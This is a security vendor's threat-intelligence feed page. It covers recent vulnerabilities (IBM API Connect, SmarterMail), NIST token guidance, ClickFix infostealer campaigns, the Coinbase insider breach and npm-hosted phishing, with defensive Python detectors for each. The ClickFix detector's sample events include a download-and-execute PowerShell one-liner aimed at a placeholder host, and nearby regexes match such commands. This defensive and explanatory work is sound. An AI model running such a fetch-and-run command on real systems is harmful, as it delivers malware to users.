Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
Critical authentication bypass in IBM API Connect allows unauthenticated access (CVE-2025-13915)
IBM disclosed a critical authentication bypass vulnerability in IBM API Connect following internal security testing. The issue, tracked as CVE-2025-13915, carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and was initially published on December 17, 2025, with bulletin updates issued through December 25, 2025. IBM API Connect is widely used to design, secure, manage, and monitor enterprise APIs, making authentication flaws in the platform particularly high risk. According to IBM, the vulnerability could allow a remote attacker with no prior authentication to bypass authentication mechanisms and gain unauthorized access to affected API Connect deployments. Impacted versions include v10.0.8.0 through v10.0.8.5 and v10.0.11.0. While IBM has not publicly disclosed detailed exploitation mechanics, the vulnerability is classified under CWE-305 (Authentication Bypass), indicating a failure in enforcing primary authentication checks. IBM has released interim fixes (iFixes) for affected versions and strongly recommends immediate remediation.
Impact: Successful exploitation could enable unauthorized access to API management interfaces and backend components, potentially allowing attackers to view or manipulate API configurations, access sensitive data, disrupt services, or leverage API Connect as a pivot point into downstream systems. Because API Connect often functions as a centralized control plane, compromise may have cascading effects across dependent applications and integrations.
Recommendation: Organizations should review IBM’s security bulletin to confirm whether IBM API Connect is deployed and identify any affected versions. Recommendations include upgrading to the appropriate iFix for v10.0.8.x or v10.0.11.0 as outlined by IBM, validating that no vulnerable instances remain exposed, and restricting access to administrative and developer-facing interfaces. If immediate patching is not feasible, temporarily disable self-service sign-up on the Developer Portal to reduce exposure. Teams should also review authentication and access logs for signs of unauthorized activity, verify the integrity of API configurations, and be prepared to rotate credentials and initiate incident response if exploitation is suspected.
Alert Issued by CSA for SmarterMail Vulnerability
The Cyber Security Agency of Singapore issued an alert regarding a critical vulnerability in SmarterTools SmarterMail software. Tracked as CVE-2025-52691, the flaw carries a CVSS v3.1 score of 10.0 and affects SmarterMail Build 9406 and earlier. SmarterTools has released security updates, and administrators are advised to upgrade immediately. The vulnerability allows an unauthenticated attacker to upload arbitrary files to any location on the mail server. If successfully exploited, this behavior can be leveraged to achieve remote code execution, depending on server configuration and the attacker’s ability to execute the uploaded files. The issue was discovered by a researcher at Singapore’s Centre for Strategic Infocomm Technologies and disclosed through coordinated vulnerability handling.
Impact: If exploited, this vulnerability could be used by unauthenticated attackers to upload files to any location on the mail server, potentially allowing them to place malicious files on the server. The attacker could then perform remote code execution using these malicious files. There is currently no confirmation if this vulnerability has been exploited in the wild.
Recommendation: If using an affected version, update to Build 9413 (released October 9, 2025), which contains the security fixes. Applying updates that contain security fixes promptly is the primary way to ensure systems are not left vulnerable to attack. Solutions like EDR can also be used to detect unusual activity in cases where vulnerabilities have yet to be discovered. Administrators should review server file systems and logs for indicators of unauthorized file uploads or anomalous execution activity, and treat any evidence of exploitation as a potential full server compromise requiring incident response, credential rotation, and integrity checks.
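The file-system review recommended above is easiest when a known-good baseline exists. The following is an added example written for this bulletin, not SmarterTools code: it hashes every file under a content directory, diffs a later snapshot against the baseline, and flags new or changed files whose extensions would execute on the server. The directory layout, file names and the extension list are constructed for illustration.

```python
"""Added example (not SmarterTools code): a file-integrity baseline for a
mail/web server's content directories. It records a SHA-256 per file, reports
files that appeared, changed or vanished since the baseline, and flags new or
modified files whose extensions are executable on the server."""
import hashlib
import os
import tempfile

# Assumption: extensions that execute server-side on the platform in use.
# This list is illustrative, not SmarterMail's own configuration.
EXECUTABLE_EXTS = {".aspx", ".ashx", ".asp", ".php", ".jsp", ".exe", ".dll", ".ps1", ".bat"}


def sha256_file(path, chunk=65536):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> sha256 for every regular file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def diff_baselines(old, new):
    """Return added, modified and removed relative paths (sorted)."""
    return {
        "added": sorted(p for p in new if p not in old),
        "modified": sorted(p for p in new if p in old and new[p] != old[p]),
        "removed": sorted(p for p in old if p not in new),
    }


def suspicious_additions(diff):
    """New or changed files with a server-executable extension: the first
    thing to inspect after an arbitrary-file-upload vulnerability."""
    return sorted(
        p for p in diff["added"] + diff["modified"]
        if os.path.splitext(p)[1].lower() in EXECUTABLE_EXTS
    )


def run_demo():
    """Constructed scenario: take a baseline, simulate what an unauthorized
    upload would leave behind (placeholder content only), return findings."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Web", "Scripts"))
        with open(os.path.join(root, "Web", "index.html"), "w") as f:
            f.write("<html>ok</html>")
        with open(os.path.join(root, "Web", "Scripts", "app.js"), "w") as f:
            f.write("console.log('app');")
        baseline = build_baseline(root)

        # Simulated later state: one legitimate-looking file edited, one
        # script-extension file dropped where the web tier can serve it.
        with open(os.path.join(root, "Web", "Scripts", "app.js"), "a") as f:
            f.write("\n// modified")
        with open(os.path.join(root, "Web", "u.aspx"), "w") as f:
            f.write("<!-- placeholder dropped file -->")
        current = build_baseline(root)

        diff = diff_baselines(baseline, current)
        return {"diff": diff, "suspicious": suspicious_additions(diff)}


if __name__ == "__main__":
    print(run_demo())
```

In practice the baseline is taken from a known-good build and stored off-host, and the comparison is scheduled; the diff output feeds the same triage path as EDR alerts.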
NIST issues draft guidance to address token and assertion theft driving SSO and cloud access compromise
The National Institute of Standards and Technology released NIST IR 8587 (Initial Public Draft) in December 2025, providing implementation recommendations to protect identity tokens and assertions from forgery, theft, and misuse. The guidance responds to recent high-profile incidents involving stolen or mis-scoped signing keys and weak token validation that enabled attackers to mint or replay valid tokens and bypass MFA in single sign-on (SSO), federation, and API access scenarios. The report expands on SP 800-53 IA-13 enhancements and is intended for federal agencies and cloud service providers, with applicability to commercial environments that rely on token-based access. The document focuses on securing stateless token architectures by strengthening signing-key protection (generation, isolation, rotation, revocation), enforcing strict token contents and audience restrictions, and shortening token lifetimes with robust refresh and revocation controls. It emphasizes hardware-backed key isolation (e.g., HSMs), tight key scoping (single-tenant where feasible), automated rotation with overlapping validity, mandatory audience checks, session monitoring, and SIEM/UEBA integration to detect token misuse patterns such as replay, redirect, or forged assertions.
Impact: Weak token and assertion controls can grant attackers broad, stealthy access across cloud and hybrid environments, enabling lateral movement and large-scale data exposure without triggering traditional credential defenses. The risks are amplified in multi-tenant clouds and long-lived tokens, where a single key compromise can have outsized blast radius. NIST’s guidance underscores that failures in key isolation, token validation, or audience scoping can be equivalent to “keys to the kingdom” for connected services.
Recommendation: Organizations should review NIST IR 8587 in full to understand how token and assertion misuse has enabled recent real-world cloud and SSO compromises and to assess how the guidance maps to their own identity architecture and risk posture. Critical recommendations include inventorying all token-issuing components and signing keys, enforcing hardware-backed key isolation for moderate- and high-risk systems, and implementing automated key rotation with clearly defined cryptoperiods and tenant scoping. Tokens should be short-lived, explicitly audience-restricted, and validated on every use, with failures generating security alerts. Organizations should also ensure revocation and session termination paths are functional, integrate token telemetry into SIEM and UEBA workflows for detection of replay or anomalous use, and prefer back-channel token presentation where feasible. Regular testing of revocation, logging, and incident response processes is essential to confirm the organization can quickly contain suspected token compromise.
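To make the token controls above concrete, here is an added example written for this bulletin; it is not code from NIST IR 8587, which specifies no code. A small HS256 issuer and verifier applies the controls the draft lists: every key carries a kid and rotates with an overlapping validity window, tokens are short-lived, and issuer, audience, signature and lifetime are checked on every verification, with the algorithm taken from an allow-list rather than trusted from the token. The secrets, issuer and audience values are constructed.

```python
"""Added example, not code from NIST IR 8587: minimal HS256 token issuance
and verification with kid-based key rotation (overlapping validity), short
lifetimes and mandatory issuer/audience checks. All values are constructed."""
import base64
import hashlib
import hmac
import json

ISSUER, AUDIENCE = "https://idp.example", "api.example"  # constructed


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


class KeyRing:
    """kid -> (secret, valid_from, valid_until). The newest active key signs;
    an older key keeps verifying until its window closes, so tokens issued
    just before rotation stay valid for their (short) lifetime."""
    def __init__(self):
        self.keys = {}

    def add(self, kid, secret, valid_from, valid_until):
        self.keys[kid] = (secret, valid_from, valid_until)

    def signing_kid(self, now):
        active = [(vf, kid) for kid, (_, vf, vu) in self.keys.items() if vf <= now < vu]
        if not active:
            raise RuntimeError("no active signing key")
        return max(active)[1]

    def secret(self, kid, now):
        if kid not in self.keys:
            raise ValueError("unknown kid")
        secret, vf, vu = self.keys[kid]
        if not vf <= now < vu:
            raise ValueError("kid outside validity window")
        return secret


def issue(ring, claims, now, lifetime=300):
    kid = ring.signing_kid(now)
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    body = dict(claims, iat=now, nbf=now, exp=now + lifetime)
    signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(body).encode())
    sig = hmac.new(ring.secret(kid, now), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify(ring, token, now, issuer=ISSUER, audience=AUDIENCE):
    """Return the claims, or raise ValueError naming the first failed check."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h64, p64, s64 = parts
    header = json.loads(b64url_decode(h64))
    if header.get("alg") != "HS256":  # allow-list; never trust alg from the token
        raise ValueError("unexpected alg")
    secret = ring.secret(header.get("kid"), now)
    expected = hmac.new(secret, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(p64))
    if claims.get("iss") != issuer:
        raise ValueError("issuer mismatch")
    aud = claims.get("aud")
    if not (aud == audience or (isinstance(aud, list) and audience in aud)):
        raise ValueError("audience missing or mismatch")
    if "exp" not in claims or now >= claims["exp"]:
        raise ValueError("expired")
    if now < claims.get("nbf", 0):
        raise ValueError("not yet valid")
    return claims


def check(ring, token, now, audience=AUDIENCE):
    """Verification outcome as a string, suitable for logging or alerting."""
    try:
        return "ok:" + verify(ring, token, now, audience=audience)["sub"]
    except ValueError as exc:
        return "rejected:" + str(exc)


def run_demo():
    t0 = 1_700_000_000
    ring = KeyRing()
    ring.add("k1", b"constructed-secret-1", t0, t0 + 3600)         # retires at t0+1h
    ring.add("k2", b"constructed-secret-2", t0 + 3000, t0 + 7200)  # 600 s overlap
    claims = {"iss": ISSUER, "aud": AUDIENCE, "sub": "u1"}
    tok_k1 = issue(ring, claims, t0 + 2900)  # only k1 active
    tok_k2 = issue(ring, claims, t0 + 3100)  # k2 is newest, so it signs
    h64, p64, s64 = tok_k2.split(".")
    forged = json.loads(b64url_decode(p64)); forged["sub"] = "u2"
    tampered = ".".join([h64, b64url(json.dumps(forged).encode()), s64])
    alg_none = b64url(json.dumps({"alg": "none", "kid": "k2"}).encode()) + "." + p64 + "."
    return {
        "signing_kid": json.loads(b64url_decode(h64))["kid"],
        "fresh": check(ring, tok_k2, t0 + 3200),
        "old_key_during_overlap": check(ring, tok_k1, t0 + 3050),
        "expired": check(ring, tok_k1, t0 + 3300),
        "retired_key": check(ring, tok_k1, t0 + 3700),
        "wrong_audience": check(ring, tok_k2, t0 + 3200, audience="other.example"),
        "tampered_claims": check(ring, tampered, t0 + 3200),
        "alg_none": check(ring, alg_none, t0 + 3200),
    }
```

Each rejection reason is a distinct string so it can be counted in a SIEM; a burst of "kid outside validity window" or "audience missing or mismatch" failures is exactly the replay and redirect signal the guidance asks teams to alert on. A production deployment would keep the secrets in an HSM or KMS rather than in process memory, as the draft recommends.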
Hudson Rock documents ClickFix–infostealer feedback loop turning legitimate business websites into malware delivery infrastructure
Researchers from Hudson Rock Threat Intelligence report that ClickFix campaigns in 2024–2025 have evolved into a self-reinforcing ecosystem in which compromised organizations become subsequent malware hosts. Using data from the ClickFix Hunter platform correlated with Hudson Rock’s infostealer intelligence, the team identified 1,635 active ClickFix domains, with 220 domains (≈13%) also appearing in infostealer logs as having exposed administrative credentials. These domains are not purpose-built attacker infrastructure but legitimate businesses whose credentials were previously stolen. Technically, ClickFix lures rely on browser-based social engineering rather than exploits, using fake CAPTCHAs, browser errors, or system prompts to trick users into pasting PowerShell commands via the Windows Run dialog. The resulting execution downloads infostealers (e.g., Lumma, Vidar, Stealc), which harvest credentials for CMS platforms and hosting panels. Stolen admin access is then reused to upload new ClickFix scripts onto legitimate sites, creating a feedback loop where infected users supply the infrastructure needed to infect the next wave of victims.
Impact: This model significantly expands the ClickFix attack surface by embedding malware delivery within trusted, legitimate business domains, reducing the effectiveness of traditional domain reputation controls. Organizations whose credentials are stolen may unknowingly host malicious content, exposing customers and partners while also facing reputational, legal, and operational risk. For defenders, the feedback loop means ClickFix activity can scale without centralized infrastructure, making takedowns and blocklists less effective and prolonging campaign longevity.
Recommendation: Organizations should assume that infostealer infections on employee endpoints can directly translate into infrastructure compromise and treat credential hygiene as a perimeter control. Endpoint protections should prioritize detection of clipboard-based execution chains, suspicious PowerShell invocation via the Run dialog, and browser-initiated script execution patterns associated with ClickFix. Credentials for CMS platforms, hosting providers, and “shadow IT” assets should be rotated regularly, protected with phishing-resistant MFA where possible, and restricted to hardened admin devices. Security teams should also proactively audit web properties for unauthorized script changes and monitor for indicators of ClickFix activity on their own domains, while user education efforts reinforce that legitimate CAPTCHAs and updates never require manual command execution.
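The detection priority named above (PowerShell launched via the Run dialog with pasted one-liners) can be expressed as a weighted rule set over process-creation telemetry. The block below is an added example for this bulletin, not code from Hudson Rock or ClickFix Hunter. Field names mirror Sysmon Event ID 1, the events and the threshold are constructed, and the parent-process rule relies on the fact that commands entered in the Run dialog are spawned by explorer.exe.

```python
"""Added example (constructed; not from Hudson Rock's report): a scoring rule
set over process-creation events that surfaces the ClickFix execution
pattern: PowerShell started from the shell (explorer.exe is the parent when
the Run dialog is used) with switches typical of pasted one-liners."""
import re

_POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")

# (rule name, predicate over one event, weight). Weights are assumptions.
RULES = [
    ("shell_parent",
     lambda e: e["ParentImage"].lower().endswith("\\explorer.exe"), 2),
    ("encoded_command",
     lambda e: re.search(r"(^|\s)-(e|ec|enc|encodedcommand)\b", e["CommandLine"], re.I) is not None, 2),
    ("hidden_window",
     lambda e: re.search(r"-w(indowstyle)?\s+hidden", e["CommandLine"], re.I) is not None, 1),
    ("no_profile",
     lambda e: re.search(r"(^|\s)-nop(rofile)?\b", e["CommandLine"], re.I) is not None, 1),
    ("expression_eval",
     lambda e: re.search(r"\biex\b|invoke-expression", e["CommandLine"], re.I) is not None, 2),
    ("remote_fetch",
     lambda e: re.search(r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", e["CommandLine"], re.I) is not None, 2),
]
ALERT_THRESHOLD = 4  # assumption: tune against your own baseline of admin usage


def score_event(event):
    """Return (score, matched rule names) for a PowerShell process creation."""
    if not event["Image"].lower().endswith(_POWERSHELL):
        return 0, []
    matched = [name for name, pred, _w in RULES if pred(event)]
    score = sum(w for name, _p, w in RULES if name in matched)
    return score, matched


def find_alerts(events, threshold=ALERT_THRESHOLD):
    alerts = []
    for e in events:
        score, matched = score_event(e)
        if score >= threshold:
            alerts.append({"User": e["User"], "score": score, "rules": matched,
                           "CommandLine": e["CommandLine"]})
    return alerts


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed events; the encoded payload is a placeholder
    {"EventId": 1, "User": "CORP\\alice", "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -nop -enc <BASE64_PLACEHOLDER>"},
    {"EventId": 1, "User": "CORP\\bob", "Image": PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1"},
    {"EventId": 1, "User": "CORP\\carol", "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe"},  # interactive console opened from the shell: low score
    {"EventId": 1, "User": "CORP\\dave", "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -nop -c \"iex ((New-Object Net.WebClient).DownloadString('https://example.invalid/v'))\""},
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert)
```

The weighting matters: an interactive console launched from the Start menu also has explorer.exe as its parent, so that rule alone stays under the threshold, while the combination with encoded, hidden or download-and-evaluate switches crosses it. The same rules map directly onto a SIEM query over Sysmon or EDR process events.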
Former Coinbase customer support agent arrested for facilitating insider-enabled data theft affecting ~69,500 customers
A former customer support agent linked to Coinbase was arrested in Hyderabad for assisting threat actors in stealing sensitive customer data earlier in 2025, according to reporting and public statements from Coinbase leadership. The arrest follows Coinbase’s disclosure in May 2025 that rogue support personnel enabled unauthorized access to internal systems, leading to the exfiltration of customer information and an attempted $20 million extortion demand. Coinbase later confirmed the incident impacted approximately 69,500 customers. Subsequent investigation attributed the access to employees of TaskUs, a third-party customer support provider based in India, who were allegedly bribed to misuse their access. Exposed data included customer names, dates of birth, physical addresses, phone numbers, email addresses, and the last four digits of Social Security numbers, with some cases also involving scanned KYC documents. Coinbase stated that TaskUs terminated the individuals involved and shut down the affected support operation, while law enforcement continues to pursue additional suspects.
Impact: This incident underscores the ongoing risk of insider-enabled compromise within outsourced support environments, where legitimate access can be abused to bypass perimeter controls. Exposure of partial SSNs, KYC documents, and contact information increases the likelihood of downstream fraud, identity theft, targeted phishing, and account takeover attempts against affected customers. More broadly, the case highlights how third-party access and human factors can materially undermine security controls even in highly regulated financial and crypto platforms.
Recommendation: Organizations should reassess third-party and outsourced support access models, enforcing strict least-privilege controls, session monitoring, and real-time alerting on anomalous data access patterns by support staff. Sensitive customer data and KYC artifacts should be segmented and further protected with just-in-time access, enhanced logging, and periodic access revalidation, particularly in offshore or outsourced environments. Regular insider-threat reviews, including behavioral monitoring and fraud risk assessments for privileged support roles, can help detect bribery or coercion indicators earlier.
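Two of the controls above, real-time alerting on anomalous data access by support staff and tighter handling of KYC artifacts, can be prototyped over a support tool's audit log. The following is an added example for this bulletin, not Coinbase or TaskUs code: it flags an agent whose hourly lookup volume spikes far above that agent's own median, and any KYC document view that is not tied to a ticket. The log records, agent names and thresholds are constructed.

```python
"""Added example (constructed; not Coinbase or TaskUs code): two detections
over a support-tool audit log: per-agent hourly lookup spikes relative to the
agent's own median, and KYC document views with no associated ticket."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_log():
    """Constructed records; the shape resembles a support-tool audit log."""
    base = datetime(2025, 5, 1, 9, 0)
    rows = []

    def add(agent, hour, n, action="view_profile", ticket="T-1"):
        for i in range(n):
            rows.append({"ts": base + timedelta(hours=hour, minutes=i % 60),
                         "agent": agent, "action": action,
                         "customer_id": f"c-{agent}-{hour}-{i}", "ticket_id": ticket})

    for h in range(5):
        add("agent-a", h, 8)
    add("agent-a", 5, 60)                                         # bulk lookups in one hour
    for h in range(6):
        add("agent-b", h, 10)
    add("agent-b", 2, 2, action="view_kyc_doc", ticket=None)      # KYC views, no ticket
    add("agent-b", 3, 1, action="view_kyc_doc", ticket="T-77")    # legitimate KYC view
    return rows


def hourly_volume_alerts(rows, min_factor=4.0, min_count=20):
    """Flag an hour where an agent's lookups exceed min_factor times that
    agent's median hourly volume (and an absolute floor, to avoid flagging
    quiet agents on small numbers). Thresholds are assumptions."""
    counts = defaultdict(lambda: defaultdict(int))
    for r in rows:
        hour = r["ts"].replace(minute=0, second=0, microsecond=0)
        counts[r["agent"]][hour] += 1
    alerts = []
    for agent, per_hour in counts.items():
        baseline = statistics.median(per_hour.values())
        for hour, n in sorted(per_hour.items()):
            if n >= min_count and n > min_factor * baseline:
                alerts.append({"type": "volume_spike", "agent": agent,
                               "hour": hour.isoformat(), "count": n, "baseline": baseline})
    return alerts


def kyc_without_ticket(rows):
    """Every KYC artifact access should be traceable to a ticket; flag the rest."""
    return [{"type": "kyc_no_ticket", "agent": r["agent"],
             "customer_id": r["customer_id"], "ts": r["ts"].isoformat()}
            for r in rows if r["action"] == "view_kyc_doc" and not r["ticket_id"]]


def run_detection(rows):
    return hourly_volume_alerts(rows) + kyc_without_ticket(rows)


if __name__ == "__main__":
    for alert in run_detection(constructed_log()):
        print(alert)
```

Using each agent's own median as the baseline keeps the rule usable across roles with very different normal volumes; in a live deployment the baseline window would be the trailing weeks rather than the same day, and the ticket-linkage rule would be enforced at access time (just-in-time access) rather than only detected after the fact.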
🚩 Spearphishing campaign abuses npm registry as hosting layer for targeted credential theft against manufacturing and healthcare organizations
Researchers from the Socket Threat Research Team uncovered a sustained spearphishing operation that abused the npm registry as a hosting and distribution mechanism for browser-based phishing content. Active for at least five months, the campaign involved 27 malicious npm packages published under six aliases and targeted 25 identified individuals across U.S. and allied manufacturing, industrial automation, plastics, and healthcare organizations. The targeting and hardcoded victim details indicate deliberate, victim-specific preparation rather than opportunistic mass phishing. Technically, the malicious packages deliver client-side HTML and JavaScript phishing flows that execute directly in the browser, masquerading as secure document-sharing portals before transitioning victims to Microsoft-branded sign-in pages with prefilled email addresses. The scripts overwrite page content, gate interaction behind basic anti-analysis checks (bot detection, honeypot fields, user-interaction requirements), and then redirect victims to threat actor-controlled infrastructure for credential harvesting. Several redirector domains and URL patterns overlap with publicly documented adversary-in-the-middle (AiTM) phishing infrastructure consistent with Evilginx, enabling potential theft of session cookies or tokens in addition to credentials.
Impact: This campaign demonstrates how trusted developer ecosystems can be repurposed as durable phishing infrastructure, increasing the likelihood that lures evade reputation-based defenses and takedowns. For targeted organizations, successful exploitation can result in compromised Microsoft credentials and session tokens, potentially bypassing traditional MFA controls and enabling unauthorized access, email account takeover, and downstream business email compromise or internal reconnaissance.
Recommendation: Organizations should treat package registries and their associated CDNs as potential phishing infrastructure, not just software supply chain risk, and ensure network and endpoint controls can inspect and restrict unexpected browser execution of packaged HTML and JavaScript content. Development teams should tighten dependency intake by validating publishers, pinning versions, and flagging packages that contain full HTML templates, DOM overwrite logic (e.g., document.write()), or heavily obfuscated browser bundles inconsistent with typical libraries. Security teams should monitor for unusual access to package CDNs from non-development contexts and block known malicious packages and domains where feasible. Because the campaign aligns with AiTM techniques, defenders should prioritize phishing-resistant MFA (e.g., WebAuthn/passkeys), enforce conditional access, and closely monitor post-authentication signals such as anomalous session reuse, token abuse, and abnormal OAuth activity.
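The dependency-intake checks recommended above (full HTML templates, DOM overwrite logic such as document.write(), heavily obfuscated browser bundles) can be automated as a heuristic scan over a package's files before it is admitted. The block below is an added example for this bulletin, not Socket's tooling; the heuristics, weights and the two constructed packages are illustrative, and the "suspect" package contains only marker strings, not a working page.

```python
"""Added example (not Socket's tooling): heuristic scan of an npm package's
files for phishing-kit traits: a full HTML document inside a JS module, DOM
overwrite calls, credential forms, hard redirects and obfuscated bundles.
Heuristics, weights and sample packages are constructed."""
import math
import re

# (label, pattern, weight). Weights are assumptions to be tuned per intake policy.
HEURISTICS = [
    ("full_html_document", re.compile(r"<!doctype html|<html[\s>]", re.I), 2),
    ("dom_overwrite", re.compile(
        r"document\.write\s*\(|document\.documentElement\.innerHTML\s*=|document\.body\.innerHTML\s*=", re.I), 3),
    ("credential_form", re.compile(r"""<input[^>]+type=["']?password""", re.I), 3),
    ("prefilled_email", re.compile(r"""type=["']?email[^>]*value=""", re.I), 1),
    ("hard_redirect", re.compile(
        r"""(window\.|document\.)?location(\.href)?\s*=\s*["']https?://|<meta[^>]+http-equiv=["']?refresh""", re.I), 2),
    ("hidden_honeypot_field", re.compile(r"""<input[^>]+(type=["']?hidden|display:\s*none)""", re.I), 1),
]


def shannon_entropy(text):
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_obfuscated(text, max_line=2000, min_entropy=5.2):
    """Very long single lines or near-base64 entropy are a cheap proxy for
    packed/obfuscated bundles that ordinary libraries rarely ship unminified."""
    lines = text.splitlines() or [""]
    return max(len(line) for line in lines) > max_line or shannon_entropy(text) > min_entropy


def scan_file(name, text):
    findings, score = [], 0
    for label, pattern, weight in HEURISTICS:
        if pattern.search(text):
            findings.append(label)
            score += weight
    if name.endswith((".js", ".html", ".htm")) and looks_obfuscated(text):
        findings.append("obfuscated_or_bundled")
        score += 2
    return score, findings


def scan_package(files, threshold=5):
    """files: {relative path: text}. Returns total score, per-file findings, verdict."""
    total, per_file = 0, {}
    for name, text in files.items():
        score, findings = scan_file(name, text)
        if findings:
            per_file[name] = findings
        total += score
    return {"score": total, "findings": per_file, "flag": total >= threshold}


BENIGN_PACKAGE = {  # constructed: a small utility module
    "package.json": '{"name":"tiny-add","version":"1.0.0","main":"index.js"}',
    "index.js": "module.exports = function add(a, b) {\n  return a + b;\n};\n",
    "README.md": "# tiny-add\nAdds two numbers.\n",
}

SUSPECT_PACKAGE = {  # constructed marker strings only; not a functioning page
    "package.json": '{"name":"secure-docs-viewer","version":"0.0.3","main":"index.js"}',
    "index.js": "\n".join([
        'var page = \'<form><input type="email" value="__TARGET__"><input type="password" name="p"></form>\';',
        'document.write("<!DOCTYPE html><html><body>" + page + "</body></html>");',
        'window.location = "https://example.invalid/auth";',
    ]),
    "dist/bundle.min.js": "eval(atob('" + "QUJD" * 600 + "'))\n",
}

if __name__ == "__main__":
    print(scan_package(BENIGN_PACKAGE))
    print(scan_package(SUSPECT_PACKAGE))
```

A scan like this belongs in the intake pipeline alongside publisher validation and version pinning; a flagged package is a reason to inspect it, not proof of malice, since legitimate UI libraries can legitimately contain templates. The entropy and line-length thresholds are the parameters most likely to need tuning against the organization's own dependency set.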
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.